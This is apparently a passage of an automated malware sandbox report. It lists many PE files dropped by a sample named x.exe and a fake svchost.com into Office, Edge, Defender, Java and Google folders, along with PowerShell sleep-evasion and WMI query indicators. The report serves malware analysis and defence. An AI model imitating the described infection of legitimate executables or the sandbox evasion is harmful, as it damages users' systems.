                              Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exeJump to dropped file
                              Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXEJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exeJump to dropped file
                              Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\PerfBoost.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exeJump to dropped file
                              Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\MSOHTMED.EXEJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\X86\MpCmdRun.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXEJump to dropped file
                              Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXEJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to dropped file
                              Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-006E-0409-0000-0000000FF1CE}\misc.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCopyAccelerator.exeJump to dropped file
                              Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\SETLANG.EXEJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\DW\DW20.EXEJump to dropped file
                              Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0C0A-0000-0000000FF1CE}\misc.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJump to dropped file
                              Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\lync99.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\FLTLDR.EXEJump to dropped file
                              Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\aimgr.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeJump to dropped file
                              Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\SELFCERT.EXEJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\chrome.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exeJump to dropped file
                              Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\SCANPST.EXEJump to dropped file
                              Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\xlicons.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MpCopyAccelerator.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\ConfigSecurityPolicy.exeJump to dropped file
                              Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXEJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSREC.EXEJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exeJump to dropped file
                              Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to dropped file
                              Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\accicons.exeJump to dropped file
                              Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exeJump to dropped file
                              Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\lyncicon.exeJump to dropped file
                              Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\IEContentService.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exeJump to dropped file
                              Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to dropped file
                              Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\officeappguardwin32.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJump to dropped file
                              Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\wordicon.exeJump to dropped file
                              Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\SPREADSHEETCOMPARE.EXEJump to dropped file
                              Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\misc.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MsMpEng.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\ConfigSecurityPolicy.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJump to dropped file
                              Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pj11icon.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\NisSrv.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\ACCICONS.EXEJump to dropped file
                              Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOICONS.EXEJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MpDefenderCoreService.exeJump to dropped file
                              Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\misc.exeJump to dropped file
                              Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\AppSharingHookController64.exeJump to dropped file
                              Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTE.EXEJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\visicon.exeJump to dropped file
                              Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeComRegisterShellARM64.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to dropped file
                              Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\joticon.exeJump to dropped file
                              Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXEJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOHTMED.EXEJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\SkypeSrv\SKYPESERVER.EXEJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\mpextms.exeJump to dropped file
                              Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\XLICONS.EXEJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\NisSrv.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEJump to dropped file
                              Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
                              Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\ai.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to dropped file
                              Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0409-0000-0000000FF1CE}\misc.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpDlpCmd.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection64.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\NAMECONTROLSERVER.EXEJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pptico.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Install\{6BB58CDD-A64E-41C8-8D92-79A516D3D118}\117.0.5938.134_117.0.5938.132_chrome_updater.exeJump to dropped file
                              Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\outicon.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\dbcicons.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\MSQRY32.EXEJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to dropped file
                              Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-040C-0000-0000000FF1CE}\misc.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXEJump to dropped file
                              Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\SDXHelper.exeJump to dropped file
                              Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\ORGCHART.EXEJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\osmclienticon.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\PPTICO.EXEJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCmdRun.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\WORDICON.EXEJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrSanBroker.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MpCmdRun.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to dropped file
                              Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXEJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Uninstall.exeJump to dropped file
                              Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\sscicons.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\X86\MpCmdRun.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection.exeJump to dropped file
                              Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXEJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\msoadfsb.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXEJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\mpextms.exeJump to dropped file
                              Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrBroker.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\Wordconv.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MpDlpCmd.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\OcPubMgr.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
                              Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\aimgr.exeJump to dropped file
                              Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to dropped file
                              Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.Loader.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to dropped file
                              Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\OLicenseHeartbeat.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\VPREVIEW.EXEJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\OLCFG.EXEJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\grv_icons.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Source Engine\OSE.EXEJump to dropped file
                              Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\msoasb.exeJump to dropped file
                              Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pubs.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe TID: 6204Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7176Thread sleep time: -12912720851596678s >= -30000s
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6660Thread sleep time: -1844674407370954s >= -30000s
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3824Thread sleep time: -2767011611056431s >= -30000s
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 744Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1532Thread sleep time: -3689348814741908s >= -30000s
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3260Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1988Thread sleep count: 6259 > 30
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4268Thread sleep time: -2767011611056431s >= -30000s
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2044Thread sleep count: 851 > 30
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2176Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
